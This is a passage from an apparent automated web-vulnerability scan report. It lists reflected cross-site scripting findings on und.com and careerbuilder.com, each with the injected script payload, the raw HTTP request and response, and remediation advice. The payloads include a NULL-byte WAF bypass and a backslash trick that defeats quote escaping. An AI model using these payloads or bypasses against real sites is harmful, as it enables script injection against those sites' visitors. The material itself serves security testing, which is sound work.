Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports%00172bf"><script>alert(1)</script>a3efd022b7f/m-footbl/grfx.cstv.com/graphics/spacer.gif','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.99. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a3fe9"><script>alert(1)</script>b7e3c097217 was submitted in the REST URL parameter 2. This input was echoed as a3fe9"><script>alert(1)</script>b7e3c097217 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sports/m-footbl%00a3fe9"><script>alert(1)</script>b7e3c097217/grfx.cstv.com/schools/nd/graphics/spacer.gif HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:46 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl%00a3fe9"><script>alert(1)</script>b7e3c097217/grfx.cstv.com/graphics/spacer.gif','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.100. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005370c"><script>alert(1)</script>1fbbb8b68cd was submitted in the REST URL parameter 3. This input was echoed as 5370c"><script>alert(1)</script>1fbbb8b68cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sports/m-footbl/grfx.cstv.com%005370c"><script>alert(1)</script>1fbbb8b68cd/schools/nd/graphics/spacer.gif HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:35 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/grfx.cstv.com%005370c"><script>alert(1)</script>1fbbb8b68cd/graphics/spacer.gif','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.101. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0036ab8"><script>alert(1)</script>7f13e4a988e was submitted in the REST URL parameter 4. This input was echoed as 36ab8"><script>alert(1)</script>7f13e4a988e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sports/m-footbl/grfx.cstv.com/schools%0036ab8"><script>alert(1)</script>7f13e4a988e/nd/graphics/spacer.gif HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:35 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/grfx.cstv.com/schools%0036ab8"><script>alert(1)</script>7f13e4a988e/nd/graphics/spacer.gif','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.102. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003477a"><script>alert(1)</script>b5f3b6e1451 was submitted in the REST URL parameter 5. This input was echoed as 3477a"><script>alert(1)</script>b5f3b6e1451 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sports/m-footbl/grfx.cstv.com/schools/nd%003477a"><script>alert(1)</script>b5f3b6e1451/graphics/spacer.gif HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:46 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/grfx.cstv.com/schools/nd%003477a"><script>alert(1)</script>b5f3b6e1451/graphics/spacer.gif','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.103. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0053aec"><script>alert(1)</script>9887020dffd was submitted in the REST URL parameter 6. This input was echoed as 53aec"><script>alert(1)</script>9887020dffd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sports/m-footbl/grfx.cstv.com/schools/nd/graphics%0053aec"><script>alert(1)</script>9887020dffd/spacer.gif HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:38 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/grfx.cstv.com/graphics%0053aec"><script>alert(1)</script>9887020dffd/spacer.gif','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.104. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92629"><script>alert(1)</script>466b89af49f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/grfx.cstv.com/schools/nd/graphics/92629"><script>alert(1)</script>466b89af49f HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:47 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/grfx.cstv.com/graphics/92629"><script>alert(1)</script>466b89af49f','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.105. http://www.und.com/sports/m-footbl/nd-m-footbl-body.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/nd-m-footbl-body.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e33e1"><script>alert(1)</script>59106a1eb00 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sportse33e1"><script>alert(1)</script>59106a1eb00/m-footbl/nd-m-footbl-body.html HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=notre+dame+football&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:42 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sportse33e1"><script>alert(1)</script>59106a1eb00/m-footbl/nd-m-footbl-body.html','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.106. http://www.und.com/sports/m-footbl/nd-m-footbl-body.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/nd-m-footbl-body.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52f3e"><script>alert(1)</script>1d9cd5ff859 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl52f3e"><script>alert(1)</script>1d9cd5ff859/nd-m-footbl-body.html HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=notre+dame+football&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:43 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl52f3e"><script>alert(1)</script>1d9cd5ff859/nd-m-footbl-body.html','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.107. http://www.und.com/sports/m-footbl/nd-m-footbl-body.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/nd-m-footbl-body.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8872"><script>alert(1)</script>1a0b9476a33 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/nd-m-footbl-body.htmld8872"><script>alert(1)</script>1a0b9476a33 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=notre+dame+football&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:43 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/nd-m-footbl-body.htmld8872"><script>alert(1)</script>1a0b9476a33','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.108. http://www.careerbuilder.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 760d3\'%3balert(1)//6256a6e010 was submitted in the Referer HTTP header. This input was echoed as 760d3\\';alert(1)//6256a6e010 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET / HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=760d3\'%3balert(1)//6256a6e010

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51678
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR23
Date: Sun, 04 Sep 2011 01:25:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
eName='JS_Home - ';
s_cb.server='www';
s_cb.channel='JS_Home';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 760d3\\';alert(1)//6256a6e010';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.109. http://www.careerbuilder.com/JobPoster/Products/PostJobsInfo.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /JobPoster/Products/PostJobsInfo.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae719\'%3balert(1)//278deaa3ac4 was submitted in the Referer HTTP header. This input was echoed as ae719\\';alert(1)//278deaa3ac4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /JobPoster/Products/PostJobsInfo.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ae719\'%3balert(1)//278deaa3ac4

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 36528
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR36
Date: Sun, 04 Sep 2011 01:25:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
ntent';
s_cb.events='scOpen';
s_cb.prop1='SMB_ProdJobPosting';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar17='natural (google) - ae719\\';alert(1)//278deaa3ac4';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.110. http://www.careerbuilder.com/JobSeeker/Jobs/JobDetails.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /JobSeeker/Jobs/JobDetails.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f332d\'%3balert(1)//4d1d49b1000 was submitted in the Referer HTTP header. This input was echoed as f332d\\';alert(1)//4d1d49b1000 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /JobSeeker/Jobs/JobDetails.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f332d\'%3balert(1)//4d1d49b1000

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 31143
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR3
Date: Sun, 04 Sep 2011 01:25:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
s_cb.channel='JS_FindJobs';
s_cb.prop1='My Job Recommendations';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
